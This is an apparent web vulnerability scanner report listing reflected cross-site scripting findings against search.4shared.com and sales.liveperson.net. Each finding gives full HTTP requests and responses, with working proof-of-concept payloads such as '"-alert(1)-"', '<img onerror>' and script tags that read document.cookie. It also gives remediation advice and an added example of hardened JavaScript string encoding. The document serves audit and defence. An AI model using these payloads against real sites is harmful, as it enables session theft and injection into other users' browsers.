GET /hc/72961245/?&visitor=16601209214853&msessionkey=2142634892255068160258a6<img%20src%3da%20onerror%3dalert(1)>590cda225df&siteContainer=STANDALONE&site=72961245&cmd=mTagKnockPage&lpCallId=835270103532-486549123190&protV=20&lpjson=1&id=9459381186&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-english%7ClpMTagConfig.db1%7Cms_header_nav_chat%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/en_US/buy/pageType.product/externalRefID.8D6DDFB5?WT.mc_id=ecomaircover_autocollage
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=2142634892255068160; HumanClickSiteContainerID_72961245=STANDALONE; LivePersonID=LP i=16601209214853,d=1303177644

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 11:27:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=2142634892255068160258a6<img src=a onerror=alert(1)>590cda225df; path=/hc/72961245
Set-Cookie: HumanClickKEY=2142634892255068160258a6<img src=a onerror=alert(1)>590cda225df; path=/hc/72961245
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 11:27:37 GMT
Set-Cookie: HumanClickSiteContainerID_72961245=STANDALONE; path=/hc/72961245
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29954

lpConnLib.Process({"ResultSet": {"lpCallId":"835270103532-486549123190","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='72961245-VID'; lpMTagConfig.FPC_VID='16601209214853'; lpMTagConfig.FPC_SKEY_NAME='72961245-SKEY'; lpMTagConfig.FPC_SKEY='2142634892255068160258a6<img src=a onerror=alert(1)>590cda225df';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_72961245'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

3.310. http://search.4shared.com/css/common.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81082"-alert(1)-"fa1a66483cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css81082"-alert(1)-"fa1a66483cf/common.css HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css81082&quot;-alert(1)-&quot;fa1a66483cf/common.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:02:11 GMT
Content-Length: 36953


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css81082"-alert(1)-"fa1a66483cf/common.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.311. http://search.4shared.com/css/common.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2823d"-alert(1)-"5c1c5cba9a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/common.css2823d"-alert(1)-"5c1c5cba9a2 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/common.css2823d&quot;-alert(1)-&quot;5c1c5cba9a2
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:04:12 GMT
Content-Length: 36964


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css/common.css2823d"-alert(1)-"5c1c5cba9a2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.312. http://search.4shared.com/css/main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89bb8"-alert(1)-"0465f9b3ed8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css89bb8"-alert(1)-"0465f9b3ed8/main.css?ver=1610 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css89bb8&quot;-alert(1)-&quot;0465f9b3ed8/main.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 20:11:58 GMT
Content-Length: 36943


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css89bb8"-alert(1)-"0465f9b3ed8/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.313. http://search.4shared.com/css/main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860a4"-alert(1)-"28ebbe0199e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/main.css860a4"-alert(1)-"28ebbe0199e?ver=1610 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/main.css860a4&quot;-alert(1)-&quot;28ebbe0199e
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 20:12:10 GMT
Content-Length: 36944


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css/main.css860a4"-alert(1)-"28ebbe0199e";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.314. http://search.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3880"-alert(1)-"5bdfa9fe7b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssa3880"-alert(1)-"5bdfa9fe7b5/mainWithoutCommon.css HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /cssa3880&quot;-alert(1)-&quot;5bdfa9fe7b5/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:02:04 GMT
Content-Length: 37008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/cssa3880"-alert(1)-"5bdfa9fe7b5/mainWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

3.315. http://search.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63f80"-alert(1)-"11bae875e74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be encoded for a JavaScript string literal before insertion (for example by replacing every character outside [A-Za-z0-9] with a \xHH or \uHHHH escape) so that neither the closing quote nor a </script> sequence can be produced; HTML entity encoding on its own is not sufficient inside a script block.

Request

GET /css/mainWithoutCommon.css63f80"-alert(1)-"11bae875e74 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/mainWithoutCommon.css63f80&quot;-alert(1)-&quot;11bae875e74
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:03:50 GMT
Content-Length: 36310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css/mainWithoutCommon.css63f80"-alert(1)-"11bae875e74";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.316. http://search.4shared.com/js/utils.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /js/utils.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36042"-alert(1)-"1c581c8364b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be encoded for a JavaScript string literal before insertion (for example by replacing every character outside [A-Za-z0-9] with a \xHH or \uHHHH escape) so that neither the closing quote nor a </script> sequence can be produced; HTML entity encoding on its own is not sufficient inside a script block.

Request

GET /js36042"-alert(1)-"1c581c8364b/utils.js HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /js36042&quot;-alert(1)-&quot;1c581c8364b/utils.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:04:09 GMT
Content-Length: 36240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/js36042"-alert(1)-"1c581c8364b/utils.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.317. http://search.4shared.com/js/utils.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /js/utils.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0040"-alert(1)-"c8a96e2acb2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be encoded for a JavaScript string literal before insertion (for example by replacing every character outside [A-Za-z0-9] with a \xHH or \uHHHH escape) so that neither the closing quote nor a </script> sequence can be produced; HTML entity encoding on its own is not sufficient inside a script block.

Request

GET /js/utils.jsf0040"-alert(1)-"c8a96e2acb2 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /js/utils.jsf0040&quot;-alert(1)-&quot;c8a96e2acb2
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:07:06 GMT
Content-Length: 36251


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/js/utils.jsf0040"-alert(1)-"c8a96e2acb2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...
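The four 4shared instances above (3.314 to 3.317) all reflect the request path into the same var url="..." line of the 404 page's reportAbuse() function. What follows is an added example and not 4shared's code: renderVulnerable() is a hypothetical reconstruction of that template as plain string concatenation, renderHardened() emits the same line with the value encoded for a JavaScript string literal (and percent-encoded first, because it is the value of the aLink query parameter), and runSnippet() executes a generated line in an isolated scope to show whether alert() fires. The host, path and payload are taken from 3.314; the template shape and helper names are assumptions.

```javascript
// Added example, not 4shared's code. The 404 page builds
//   var url="/abuse.jsp?aLink=http://search.4shared.com<request path>";
// by concatenation. renderVulnerable() is a hypothetical reconstruction of
// that template, renderHardened() the same line with proper encoding, and
// runSnippet() executes a generated line with a recording alert().

// Hypothetical reconstruction of the vulnerable template (assumption).
function renderVulnerable(requestPath) {
  return 'var url="/abuse.jsp?aLink=http://search.4shared.com' + requestPath + '";';
}

// Encode a value for a double-quoted JavaScript string literal inside an HTML
// <script> block: every character outside [A-Za-z0-9] becomes \xHH or \uHHHH,
// so the closing quote, a line terminator (including U+2028/U+2029) or a
// "</script>" sequence cannot appear in the emitted source.
function jsStringEncode(value) {
  let out = '';
  for (const ch of value) {
    const cp = ch.codePointAt(0);
    if (/^[A-Za-z0-9]$/.test(ch)) out += ch;
    else if (cp < 0x100) out += '\\x' + cp.toString(16).padStart(2, '0');
    else if (cp < 0x10000) out += '\\u' + cp.toString(16).padStart(4, '0');
    else out += '\\u{' + cp.toString(16) + '}';
  }
  return out;
}

// Hardened template. The page URL is percent-encoded first because it is the
// value of the aLink query parameter (otherwise "&" or "#" in the path would
// truncate it), then the whole literal is encoded for the script context.
function renderHardened(requestPath) {
  const target = '/abuse.jsp?aLink=' + encodeURIComponent('http://search.4shared.com' + requestPath);
  return 'var url="' + jsStringEncode(target) + '";';
}

// Execute one generated "var url=...;" line in an isolated function scope
// whose alert() records its calls, standing in for the browser's evaluation.
function runSnippet(line) {
  const calls = [];
  const recordingAlert = (x) => { calls.push(x); return 0; };
  const fn = new Function('alert', line + ' return url;');
  return { url: fn(recordingAlert), alertCalls: calls };
}

// The exact path the report sent in 3.314 (REST URL parameter 1).
const PAYLOAD_PATH = '/cssa3880"-alert(1)-"5bdfa9fe7b5/mainWithoutCommon.css';

const vulnerable = runSnippet(renderVulnerable(PAYLOAD_PATH));
const hardened = runSnippet(renderHardened(PAYLOAD_PATH));
console.log('vulnerable:', vulnerable.alertCalls.length, 'alert call(s), url =', vulnerable.url);
console.log('hardened:  ', hardened.alertCalls.length, 'alert call(s), url =', hardened.url);
```

With the vulnerable template the generated line evaluates as string minus alert(1) minus string: alert() runs and url ends up as NaN, which is exactly why the scanner's "-alert(1)-" payload is a reliable probe for this context. With the hardened template alert() never runs and decoding the aLink value gives back the original path, quote included.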

3.318. http://search.4shared.com/search.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /search.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ef9a6--><script>alert(1)</script>310e4e7016 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response, inside a debugging comment (<!-- params: {...} -->) that lists every request parameter; the --> in the payload closes that comment, and the script element that follows is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. Entity-encoding > as &gt; keeps the literal terminator out of the comment, but the more robust fix is to remove the parameter dump from production responses altogether; if a comment must carry user data, replace every > and every -- sequence before insertion so that --> cannot be formed.

Request

GET /search.html?ef9a6--><script>alert(1)</script>310e4e7016=1 HTTP/1.1
Host: search.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: hostid=1214903107; Expires=Sat, 20-Feb-2021 23:05:47 GMT; Path=/
Set-Cookie: search.view2=ls; Domain=.4shared.com; Expires=Thu, 23-Feb-2012 23:05:47 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:05:47 GMT
Connection: close
Content-Length: 97304


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>
...[SNIP]...
<!-- params: {searchName=, ef9a6--><script>alert(1)</script>310e4e7016=1, start=0} -->
...[SNIP]...

